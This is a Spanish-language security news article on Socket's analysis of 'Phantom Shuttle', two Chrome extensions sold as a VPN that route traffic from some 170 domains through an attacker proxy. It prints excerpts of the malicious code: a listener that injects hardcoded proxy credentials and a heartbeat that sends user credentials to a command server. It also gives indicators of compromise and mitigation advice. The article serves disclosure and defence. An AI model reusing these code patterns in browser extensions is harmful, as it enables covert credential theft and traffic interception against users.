Descubren extensiones maliciosas en Chrome que roban credenciales desde el 2017

Investigadores de Socket descubrieron dos extensiones de Chrome con capacidad de intercepción de tráfico que operan bajo el nombre «Phantom Shuttle» (幻影穿梭), afectando a más de 2,180 usuarios que pagaron suscripciones creyendo adquirir un servicio VPN legítimo. Las extensiones permanecen activas en Chrome Web Store al momento de esta publicación.

Lo que necesitas saber ahora

Indicadores críticos: Dos extensiones idénticas (IDs: fbfldogmkadejddihifklefknmikncaj y ocpcmfmiidofonkbodpdhgddhlcmcofd) ejecutan ciberataques de tipo man-in-the-middle (MitM) mientras mantienen una fachada comercial con sistema de pagos integrado.

Modelo de operación: Los usuarios pagan entre ¥9.9 y ¥95.9 CNY ($1.40 a $13.50 USD) por membresías VIP que activan automáticamente el modo «smarty», enrutando tráfico de más de 170 dominios de alto valor a través de infraestructura controlada por el atacante en phantomshuttle[.]space (IP: 47[.]244[.]125[.]55, Alibaba Cloud Hong Kong).

Alcance temporal: Activas desde noviembre de 2017 (extensión principal) y abril de 2023 (variante secundaria), con infraestructura de comando y control (C2) operacional confirmada el 23 de diciembre de 2025, según Socket Threat Research Team.

Por qué este caso es único

A diferencia de malware distribuido mediante ingeniería social tradicional, Phantom Shuttle implementa un modelo comercial completo con integración de Alipay y WeChat Pay, creando retención de víctimas mediante compromiso financiero mientras genera ingresos para el actor de amenaza. La extensión realiza pruebas de latencia funcionales y muestra estados de conexión reales, reforzando la ilusión de producto legítimo.

Nota: Ocho años de operación continua (2017-2025) con registro de dominio válido hasta noviembre de 2026 implican una infraestructura criminal establecida, en vez de una campaña a corto plazo.

Mecanismo técnico de compromiso

Inyección de credenciales de autenticación

Las extensiones modifican dos bibliotecas JavaScript (jquery-1.12.2.min.js y scripts.js) insertando código malicioso que registra un listener en chrome.webRequest.onAuthRequired:

chrome.webRequest.onAuthRequired.addListener(function(B, A) {
    A({
        authCredentials: {
            username: "topfany",
            password: "963852wei"
        }
    })
}, {
    urls: ["<all_urls>"]
}, ["asyncBlocking"]);

Este listener intercepta cada desafío de autenticación HTTP (Basic Auth, Digest Auth, proxy authentication) antes de que el navegador muestre el prompt de credenciales. El modo asyncBlocking asegura inyección sincrónica, volviéndose completamente desapercibida por el usuario.

Configuración dinámica de proxy mediante PAC script

Tras activación VIP, la extensión implementa tres modos operacionales:

1. «close»: Proxy deshabilitado
2. «always»: Todo el tráfico web enrutado a través del proxy
3. «smarty»: Lista hardcoded de 170+ dominios específicos

Dominios objetivo incluyen:

• Plataformas de desarrollo: github.com, stackoverflow.com, docker.com, registros npm
• Servicios cloud: amazonaws.com, digitalocean.com, Azure
• Soluciones empresariales: cisco.com, ibm.com, vmware.com
• RRSS: facebook.com, twitter.com, instagram.com
• Sitios pornográficos: pornhub.com, xvideos.es, 91porn.com

Por qué importa la inclusión de sitios pornográficos: Socket teoriza que esta categoría proporciona material de chantaje y apalancamiento de privacidad, combinando historial de navegación con datos financieros y personales para crear oportunidades de extorsión más allá de simple venta de credenciales.

El PAC script excluye rangos IP privados (10.x, 192.168.x, 127.x) para mantener conectividad LAN normal y excluye el dominio C2 mismo para asegurar confiabilidad del canal de control. También excluye endpoints de verificación de conectividad de Google para evitar detección.

Sistema de «exfiltración» continua

Heartbeat de 60 segundos con transmisión cada 5 minutos

chrome.alarms.create("heartbeat", {
    delayInMinutes: 1,
    periodInMinutes: 1
});

Datos transmitidos al C2:

• Email de usuario
• Contraseña en texto plano
• Número de versión («319»)
• Estado VIP y fecha de expiración

Por qué importa: Cada transmisión a https://phantomshuttle[.]space/index[.]php ocurre vía GET request con cuerpo JSON, proporcionando exfiltración de credenciales y monitoreo de sesión continuo para todos los usuarios VIP activos.

Captura mediante posición MitM

Una vez el tráfico se enruta a través del proxy autenticado con credenciales hardcoded, el atacante obtiene posición man-in-the-middle que habilita:

• Captura directa de credenciales de formularios de login
• Robo de cookies de sesión desde headers HTTP
• Extracción de tokens API de requests
• Intercepción de tarjetas de crédito en formularios de pago
• Colección de datos POST (contraseñas, información personal)
• Manipulación de respuestas
• Inyección de payloads maliciosos

Tráfico HTTPS: Permanece cifrado en tránsito pero podría ser interceptado si el actor despliega certificado root malicioso.

Impacto para desarrolladores y empresas

Riesgo corporativo: Un empleado usando esta extensión en dispositivo personal que también accede VPN corporativa crea un vector de brecha. La lista de 170 dominios específicamente incluye consolas de servicios cloud (AWS, Azure, GCP), sistemas de control de versiones (GitHub, GitLab), y herramientas de desarrollo (Docker, registros npm).

Cadena de suministro: El robo de credenciales de desarrollador habilita ataques supply chain a través de repositorios de código fuente comprometidos o inyección de paquetes maliciosos.

Según Socket: «La combinación de exfiltración por heartbeat (credenciales y metadatos) más MitM de proxy (captura de tráfico en tiempo real) proporciona capacidades comprensivas de robo de datos operando continuamente mientras la extensión permanece activa.»

Infraestructura operacional verificada

Dominio C2: phantomshuttle[.]space

• IP: 47[.]244[.]125[.]55 (Alibaba Cloud, Hong Kong)
• Registro: 3 de noviembre de 2017
• Expiración: 3 de noviembre de 2026
• CDN: Cloudflare (protección DDoS y privacidad de registrante)
• Certificado SSL válido en puerto 443

Atribución geográfica: Uso de idioma chino en descripción de extensión, integración Alipay/WeChat Pay, y hosting Alibaba Cloud sugieren operación basada en China, aunque actor podría estar en cualquier ubicación dada la accesibilidad de la infraestructura cloud.

Medidas de prevención y mitigación

Para usuarios individuales

1. Acción inmediata: Remover extensiones Phantom Shuttle (IDs: fbfldogmkadejddihifklefknmikncaj y ocpcmfmiidofonkbodpdhgddhlcmcofd) de Chrome
2. Cambiar todas las credenciales usadas en dominios de la lista objetivo mientras las extensiones estaban activas
3. Revisar extractos bancarios para transacciones no autorizadas
4. Habilitar autenticación multifactor (MFA) en todas las cuentas críticas
5. Auditar mensualmente extensiones instaladas y remover innecesarias
6. Verificar permisos antes de instalar cualquier extensión, especialmente herramientas VPN o proxy
7. Evitar extensiones que soliciten permiso webRequestAuthProvider
8. Nunca reutilizar credenciales entre sistemas personales y corporativos

Para equipos de seguridad

1. Desplegar whitelisting de extensiones y bloquear permisos peligrosos (webRequestAuthProvider, proxy, management)
2. Monitorear extensiones con sistemas de pago por suscripción combinados con permisos de proxy
3. Implementar análisis de red para intentos sospechosos de autenticación proxy
4. Flagear extensiones que hardcodean credenciales o direcciones de wallets
5. Comparar hash y tamaño de archivos de bibliotecas contra distribuciones legítimas para detectar trojans
6. Desplegar EDR con capacidades de análisis de extensiones de navegador
7. Vigilar dominios con historiales largos de registro pero presencia legítima mínima
8. Implementar políticas de Group Policy que restrinjan instalación de extensiones no aprobadas

Indicadores de compromiso (IoC)

Extensiones Chrome

• Nombre: Phantom Shuttle (幻影穿梭)
• Extension IDs:
  • fbfldogmkadejddihifklefknmikncaj (2,000 usuarios, publicada 26 nov 2017)
  • ocpcmfmiidofonkbodpdhgddhlcmcofd (180 usuarios, publicada 27 abr 2023)
• Versión: 3.1.9

Indicadores de red

• Dominio C2: phantomshuttle[.]space
• IP C2: 47[.]244[.]125[.]55
• Credenciales proxy: topfany / 963852wei
• Endpoints API:
  • https://phantomshuttle[.]space/index[.]php?g=user&m=register&a=do_query_server
  • https://phantomshuttle[.]space/price[.]php
  • https://phantomshuttle[.]space/index[.]php?g=Pay&m=Index&a=payaction
  • https://phantomshuttle[.]space/index[.]php?g=wxpay&m=wxpay&a=wxpay_api

Archivos modificados

• assets/js/jquery-1.12.2.min.js (código malicioso prepended)
• scripts.js (código malicioso prepended)

Almacenamiento local Chrome

{
    "email": "user@example.com",
    "password": "user_password",
    "token": "session_token",
    "level": "1",
    "position": "[encoded_proxy_url]",
    "autoProxyList": ["google.com", "facebook.com", ...]
}

Estado actual y solicitudes de takedown

Socket ha enviado solicitudes de remoción al equipo de seguridad de Chrome Web Store. Las extensiones permanecen disponibles para descarga al momento de publicación de este análisis (23/12/25).

¿Te pareció útil este artículo?

Si te pareció util este artículo, ¡te invitamos a compartirlo con personas que podrían verse beneficiadas al leerlo!